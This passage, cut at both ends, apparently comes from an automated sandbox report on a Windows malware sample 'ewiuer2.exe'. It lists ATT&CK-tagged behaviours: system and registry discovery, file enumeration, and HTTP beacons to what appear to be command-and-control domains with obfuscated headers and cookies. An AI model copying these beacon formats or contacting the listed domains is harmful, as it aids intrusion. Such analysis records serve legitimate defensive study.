1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000cd7500000000500118000000000006c4cd75087d1a00a8a71b000000000002000000000000000000000100000000100000000000010198d0120000000000c4ff120095e11477c8057600feffffffe06318771664187700000000087d1a000400cc0000000000087d1a00007d1a00acd11200f4c509770000180000000000087d1a00f8d112006321ce750000180000000000087d1a003cc9cd750000000000000000000400000200000000000000087d1a00b4c57c77000000000400cc000000000000000000000000006455400032d51200f4d61200000400000000000000000000 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000018000080000068ab1d00148812000464187738011800e0631877d49f7c77000000000000180070ab1d006dd10977259509946caeb1750000000000000000e4010000c4001800302f18000100000000001800500118000c00000070ab1d00302f180002000000180000002c0000008f060000000000000000000003000000b48712008f06000000000000000000000f00000f0f060000c0751177703a1d0000000000c0751177d087120079da097700000000302f180028881200dbd2097770ab1d00c4001800cd9a09948f060000ff2b1877b09f7c770000000004021800 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000098e64b0000001302d00b76013ce44b01ff2b187798e64b0195e11477e8057600feffffff435c18775059187734020000400200008a051302880513021000000080000000ff2b187774f2257620a3c16cac0118000000180001000000c0191b000700d9005b00000000d15f73ac01180000001800880513020800d4005b0000005b000000bcee1877606f180000001302200000000900cf000000000038c61d00506c1800706d180030de1d00187118000000130230e54b0138c61d00b0e64b0195e11477d00b7600feffffffff2b18779a2a187720a3c16c10a3c16c00000000 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000018773cc67c7764d51200ac03180000001800500118000000000000000000302f1800000000009c2f1800000000007e02000000000000302f18004302000050ea210000000000c30200000000000080000000000000000000000000000000000000000000000002000002f0c62100b3320081000000000000000000000000ff0700000000180002000000d0d11200207e1877a8d21200000000003e004000a8d212000200000074d21200626f187701821877b4c57c7764d5120008020000d8cc2100c4ff120040420f006455400032d51200f4d612000004000040420f0000000000 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e4de1200000000003e00000034df1200feffffffbcde1200cf001977d60019771a927c773e0000001f00000034df12000000000090de120000000000f8de1200 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000012000000000064000000f8e11200d8e21200c4ff1200bd0611755ae2d975feffffffcd750f7564560a778c01000074e2120064000000d8e2120000000000dce21200267e40008c01000074e2120064000000d8e212000000000000000000b8e94000010000002d781678117809780d781d7836780d781578787849784b784b7840784b784b7848784c784e7849784c78497848784d784c784f784878407878787878787878787878787878787878787878787878787878787878787878787878787878787878000000006455400024e5120010e712000100000000000000684f4100 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000240000000000e8f22900fc9812000464187738012400e06318775ad47c770000000000002400f0f229006dd10977140fc4006caeb1750000000000000000040200009f2700b8c40024000100000000002400500124000c000000f0f229000000000002000000180000002c000000d89812000000000000000000030000009c9812003c6e1877000000000000000000000000507b2600c0751177507b260000000000c0751177b898120079da0977000000000200000010991200dbd2097700000000e2d20977ac0ec4009f270000ff2b1877fed57c770000000004022400 (UID: 00000000-00005220)\n \"ewiuer2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000098e6aa0000003f00b65076013ce4aa01ff2b187798e6aa0195e114778e5e7600feffffff435c18775059187734020000400200008a053f0088053f001000000080000000ff2b187712a9c47620a3c16cac0124000000240001000000f03f27002a002a003900000000d15f73ac0124000000240088053f002b0025003900000039000000bcee1877706f240000003f00200000002c00200000000000980a2a00606c2400806d240020be2a002871240000003f0030e5aa01980a2a00b0e6aa0195e11477b6507600feffffffff2b18779a2a187720a3c16c10a3c16c00000000 (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"ewiuer2.exe\" called \"IsWow64Process\" with parameter \"3444\" - (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"IsWow64Process\" with parameter \"4444\" - (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"IsWow64Process\" with parameter \"5220\" - (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"ewiuer2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"ewiuer2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"ewiuer2.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"ewiuer2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindFirstFileW\" with parameter %APPDATA%\\*.* (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter Adobe (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter ewiuer2.exe (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter HNC (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter Identities (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter Macromedia (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter Media Center Programs (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter Microsoft (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter Mozilla (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter Sun (UID: 00000000-00003168)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" called \"FindNextFileW\" with parameter Wireshark (UID: 00000000-00003168)\n \"ewiuer2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\System32\\*.* (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter 0409 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter 12520437.cpx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter 12520850.cpx (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter 7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter 7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter aaclient.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter accessibilitycpl.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter ACCTRES.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter acledit.dll (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"FindNextFileW\" with parameter aclui.dll (UID: 00000000-00003444)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"ewiuer2.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"ewiuer2.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /457/533.html\"\n Found http requests in header \"GET /34/993.html\"\n Found http requests in header \"GET /939/382.html\"\n Found http requests in header \"GET /644/428.html\"\n Found http requests in header \"GET /987/678.html\"\n Found http requests in header \"GET /88/452.html\"\n Found http requests in header \"GET /619/651.html\"\n Found http requests in header \"GET /883/315.html\"\n Found http requests in header \"GET /22/867.html\"\n Found http requests in header \"GET /506/903.html\"\n Found http requests in header \"GET /881/70.html\"\n Found http requests in header \"GET /91/622.html\"\n Found http requests in header \"GET /922/654.html\"\n Found http requests in header \"GET /851/52.html\"\n Found http requests in header \"GET /683/84.html\"\n Found http requests in header \"GET /514/116.html\"\n Found http requests in header \"GET /349/128.html\"\n Found http requests in header \"GET /949/928.html\"\n Found http requests in header \"GET /968/369.html\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-118", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the URL data", "description": "\"ewiuer2.exe\" called \"InternetReadFile\" with parameter 4096 (UID: 00000000-00003444)\n \"ewiuer2.exe\" called \"InternetReadFile\" with parameter 4096 (UID: 00000000-00004444)\n \"ewiuer2.exe\" called \"InternetReadFile\" with parameter 4096 (UID: 00000000-00005220)", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"/457/533\" in header \"GET /457/533.html HTTP/1.1From: 133833028898974522Via: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /457/533.html HTTP/1.1From: 133833028898974522Via: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"a/08\" in header \"GET /457/533.html HTTP/1.1From: 133833028898974522Via: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"6ea1Host\" in header \"GET /457/533.html HTTP/1.1From: 133833028898974522Via: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /457/533.html HTTP/1.1From: 133833028898974522Via: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /34/993.html HTTP/1.1From: 133833028898974522Via: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1Host: ow5dirasuek.comConnection: Keep-Alive\"\n Contains base64 string in header \"a/08\" in header \"GET /34/993.html HTTP/1.1From: 133833028898974522Via: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1Host: ow5dirasuek.comConnection: Keep-Alive\"\n Contains base64 string in header \"6ea1Host\" in header \"GET /34/993.html HTTP/1.1From: 133833028898974522Via: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1Host: ow5dirasuek.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /34/993.html HTTP/1.1From: 133833028898974522Via: bjledplYpdq;225]^mc`;4Yn`m_l8//+./.0]jq<1/0,\\j`w<-d4\\78_.a/08^/d0413_7\\aa__`,6ea1Host: ow5dirasuek.comConnection: Keep-Alive\"\n Contains base64 string in header \"/939/382\" in header \"GET /939/382.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /939/382.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"apfc\" in header \"GET /939/382.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"1213\" in header \"GET /939/382.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"423/\" in header \"GET /939/382.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"75cb6d6hc78a79af35de0b54f3/5Host\" in header \"GET /939/382.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /939/382.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/644/428\" in header \"GET /644/428.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832899|1738832899|0|1|0; snkz=<IPv4>\"\n Contains base64 string in header \"html\" in header \"GET /644/428.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832899|1738832899|0|1|0; snkz=<IPv4>\"\n Contains base64 string in header \"apfc\" in header \"GET /644/428.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832899|1738832899|0|1|0; snkz=<IPv4>\"\n Contains base64 string in header \"1213\" in header \"GET /644/428.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832899|1738832899|0|1|0; snkz=<IPv4>\"\n Contains base64 string in header \"423/\" in header \"GET /644/428.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832899|1738832899|0|1|0; snkz=<IPv4>\"\n Contains base64 string in header \"75cb6d6hc78a79af35de0b54f3/5Host\" in header \"GET /644/428.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832899|1738832899|0|1|0; snkz=<IPv4>\"\n Contains base64 string in header \"Keep\" in header \"GET /644/428.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832899|1738832899|0|1|0; snkz=<IPv4>\"\n Contains base64 string in header \"f8b57a425714546c965f91b67aa30a59\" in header \"GET /644/428.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;22.1213`mt?423/_mcz?568`75cb6d6hc78a79af35de0b54f3/5Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832899|1738832899|0|1|0; snkz=<IPv4>\"\n Contains base64 string in header \"/987/678\" in header \"GET /987/678.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /987/678.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"apfc\" in header \"GET /987/678.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"1213\" in header \"GET /987/678.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"423/\" in header \"GET /987/678.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"ee32c115\" in header \"GET /987/678.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /987/678.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /88/452.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832908|1738832899|4|2|0; snkz=<IPv4>\"\n Contains base64 string in header \"apfc\" in header \"GET /88/452.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832908|1738832899|4|2|0; snkz=<IPv4>\"\n Contains base64 string in header \"1213\" in header \"GET /88/452.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832908|1738832899|4|2|0; snkz=<IPv4>\"\n Contains base64 string in header \"423/\" in header \"GET /88/452.html HTTP/1.1From: 133833046141054708Via: 